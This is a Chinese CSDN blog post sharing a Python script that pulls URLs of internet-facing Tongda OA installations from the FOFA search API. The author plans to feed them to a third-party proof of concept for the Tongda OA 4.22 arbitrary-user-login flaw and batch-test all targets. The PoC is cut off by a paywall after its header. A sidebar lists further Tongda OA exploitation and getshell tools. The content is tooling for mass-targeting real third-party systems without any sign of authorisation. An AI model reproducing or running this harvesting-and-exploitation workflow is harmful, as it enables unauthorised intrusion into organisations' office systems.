fofa域名检测存活工具_fofaAPI获取url并批量检测4.22通达oa任意用户登录漏洞

最新推荐文章于 2024-07-07 00:27:16 发布
最新推荐文章于 2024-07-07 00:27:16 发布
阅读量1k 收藏
点赞数
文章标签: fofa域名检测存活工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29558841/article/details/111901394
版权
该博客分享了一段使用Python编写的脚本,该脚本结合fofaAPI获取包含"通达OA"关键字的URL,并利用提供的POC批量检测这些目标是否存在4.22版本的通达OA任意用户登录漏洞。脚本首先从fofa获取结果,然后通过循环调用POC进行漏洞测试,最后将结果写入文件。
摘要由CSDN通过智能技术生成

Python练习时长7天半的成果,大佬留情

问题

fofa返回结果中有的带https://

大佬的通达oaPOC无法处理https://,需要修改

fofaAPI

import requests

import json

import base64

def main():

email="" #email

key="" #key

targetsrting='app="通达OA"' #搜索关键字

target=base64.b64encode(targetsrting.encode('utf-8')).decode("utf-8")

page="1" #翻页数

size="100" #每页返回记录数

url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+target+"&size="+size

#print(url)

resp = requests.get(url)

data_model = json.loads(resp.text)

data_url=[]

save=open('fofaurl.txt','w+')

for i in data_model['results']: #取结果列表

for j in i[0:1]: #取结果列表中的每个列表的url,需要IP则改为[1:2]

data_url.append(j)

for i in data_url:

save.write(i+"\n")

save.close()

#print(data_model)

if __name__ == '__main__':

main()

大佬的POC加自己写的批量执行的脚本

太菜了,不知道怎么修改POC批量测试目标,就百度了下PYTHON执行命令,循环100次。。。。。。

大佬的POC

'''

@Author : Sp4ce

@Date : 2020-03-17 23:42:16

@LastEditors : Sp4ce

@LastEditTime : 2020-04-22 16:24:52

@Description : Challenge Everything.

'''

import requests

from random import choice

import argparse

import json

USER_AGENTS = [

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media

最低0.47元/天 解锁文章
朕说
关注
通达OA interface/go.php 注入漏洞批量检测脚本+利用
课嗨教育的专栏
02-19 3785
目录 批量检测: 稍微改动下,getshell脚本: python写的,fofa 4000目标检测出来1200+存在: 批量检测: # -*- coding: utf-8 -*- import requests,sys import argparse import urllib3 import ssl import vthread urllib3.disable_warnings() ssl._create_default_https_context = ssl._create_unve
通达OA漏洞检查工具V1.3
xiaokp7的博客
09-17 826
8、通达OA后台attachment_remark文件包含漏洞(TongdaOA_Attachment_remark_FileInclude)9、通达OA后台management任意文件上传漏洞(TongdaOA_Management_Upload)11、通达OA v11.6前台任意文件删除+任意文件上传漏洞(TongdaOA_Delete_Auth)4、通达OA后台ispirit任意文件上传漏洞(Tongda_Ispirit_Upload)5.新增通达OA v11.6前台任意文件删除+任意文件上传漏洞
工具分享】FOFA——网络空间测绘搜索引擎
最新发布
LongL_GuYu的博客
07-07 2106
FOFA是一款网络空间测绘的搜索引擎,它专注于帮助用户收集和分析互联网上的设备和服务信息。
最新通达OA漏洞利用工具
leah126的博客
12-31 1471
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
推荐文章:一键攻防 - 通达OA漏洞利用工具
gitblog_00065的博客
06-01 450
推荐文章:一键攻防 - 通达OA漏洞利用工具 TongdaOATool通达OA漏洞利用工具项目地址:https://gitcode.com/gh_mirrors/to/TongdaOATool 1、项目介绍 在网络安全的世界中,了解并预防潜在风险至关重要。为此,我们向您推荐一款名为TongdaOATool的开源工具,专为通达OA(Tongda Office Automation)系统的安全性评估...
通达OA检测工具-TongdaScan_go
siu~
08-15 594
通达OA漏洞检测工具-TongdaScan_go
fofa域名检测存活工具_GitHub - smartzh/XrayFofa: 一款将xray和fofa完美结合的自动化工具,调用fofaAPI进行查询扫描,新增爬虫爬取扫描...
weixin_33910191的博客
12-23 412
XrayFofa????????????一款将xray和fofa结合运行的脚本,配置方法参考了piaolin大佬写的fofa2Xray增加了一些自己的想法(望指正),点个小星星支持一下吧????????????XrayFofa git克隆下载:git clone https://github.com/Miagz/XrayFofa.git克隆下载需安装第三方库: python3 -m pip install requests pyy...
fofa域名检测存活工具_GitHub - Miagz/XrayFofa: 一款将xray和fofa完美结合的自动化工具,调用fofaAPI进行查询扫描,新增爬虫爬取扫描...
weixin_26801149的博客
12-23 424
XrayFofa????????????一款将xray和fofa结合运行的脚本,配置方法参考了piaolin大佬写的fofa2Xray增加了一些自己的想法(望指正),点个小星星支持一下吧????????????XrayFofa git克隆下载:git clone https://github.com/Miagz/XrayFofa.git克隆下载需安装第三方库: python3 -m pip install requests pyy...
Fofa_url采集器.zip
10-04
今天我们要探讨的是一款名为"Fofa_url采集器"的工具,它专门用于批量采集FOFA平台上的URL数据,为用户提供了极大的便利。 首先,我们需要了解FOFAFOFA是一个基于Web的网络资产搜索引擎,由白帽黑客社区开发,主要...
批量检测可用域名
子清行
09-25 5566
在《内网IP自动获取》的评论中,有个网友希望能帮忙写一个批处理来批量检测域名的可用性。但前两天都在赶文档,刚刚接到老师电话说推迟到10月08日交,心头大石终于落地^_^。所以就马上开工帮那位朋友实现这个批处理!原理很简单,就是找一个域名注册网站(比如我这里找的中国域名为 http://www.chinadomain.com.cn/),这类网站一般都提供了域名查询功能,我们只要用 curl 等命
最新通达漏洞各版本利用poc.rar
03-31
最新通达漏洞各版本利用poc
fofa查询接口.exe
08-16
fofa查询接口,需要apikey,默认查询10000条, host,ip,title字段可以多选,fofa自身还有其他很多字段,没有限制,不过我一般获取这三个字段
fofa搜索使用
weixin_42786460的博客
09-25 1154
fofa搜索使用
Python爬虫爬取Fofa中的url
weixin_50464560的博客
03-19 1098
Python3爬虫爬取Fofa中的urlPython3爬虫实战F5 BIG-IP TMUI(CVE-2020-5902)远程代码执行漏洞 一、漏洞简述 F5 BIG-IP 是美国F5公司一款集成网络流量管理、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 前不久F5官方公布了在流量管理用户界面(TMUI)配置实用程序的特定页面中存在一处远程代码执行漏洞。攻击者可以利用该漏洞构造恶意请求,造成任意Java 代码执行,进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启
fofa域名检测存活工具_安全圈里的fofa到底是是一个什么样的网站?他和zoomeye有什么不同??...
weixin_39614546的博客
01-13 1104
【知乎真的体验越来越差,本来是“评论”回复5楼 “匿名用户” 结果告诉我字数超长了,所以只能当回答了!!!!】因为知乎这个用户体验问题,本来很少来知乎了,无意看到这个帖子及回复 感觉楼主可能有点误解 所以在这里说明下:0x01 关于“自由度”的问题“zoomeye不开放国内资产“ 说法是不对的!只需要实名制用户使用中国IP就可以查询国内资产,这个主要是考虑到某些政策合规的采取的措施这个很多数据类...
python脚本之FOFA提取搜索结果URL并存储
qq_57223070的博客
02-17 734
希望能够帮到你
FOFA 使用API获取IP等资产信息
热门推荐
tigerOrtiger的博客
04-18 1万+
FOFA 调用API获取IP等资产信息 0x01 FOFAAPI介绍 首先介绍什么是FOFAfofa无边,回头是岸 ????)FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。和fofa类似的搜索引擎还有Shodan、zoomceye(钟馗之眼)。 关于API的详细介绍各位客官里面请...
网络安全-FOFA资产收集和FOFA API调用
weixin_48137911的博客
02-18 1981
ip=“1.1.1.1” 从IP中搜索包含1.1.1.1的网站,要用搜搜ip作为名称。就能找出开放了8009端口的服务器,比如你去找ssh22端口这样去找。比如这个是用python的脚本,这样就可以快速找出来一些管理后台了。比你手工输入快得多,而且都是有格式的,可以利用它去搜索全网的信息。如果有能力购买的呢,可以利用脚本,调用fofaAPI接口。这个关联到佛山这个城市里面的8009的端口的服务器的资产。就可以搜到开放的phpadmin在公网上的设备了。其他的也是一样的,这对于扩大攻击面是很有帮助的。
通达OA v2017 action_upload.php高危任意文件上传漏洞解析
通过使用FOFA工具(一个开源的安全漏洞扫描器),可以快速定位到安装了通达OA且版本为2017的应用程序,比如那些标记为"TDXK-通达OA"的应用实例。 POC(Proof of Concept,漏洞验证方法)提供了一个具体的示例,展示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值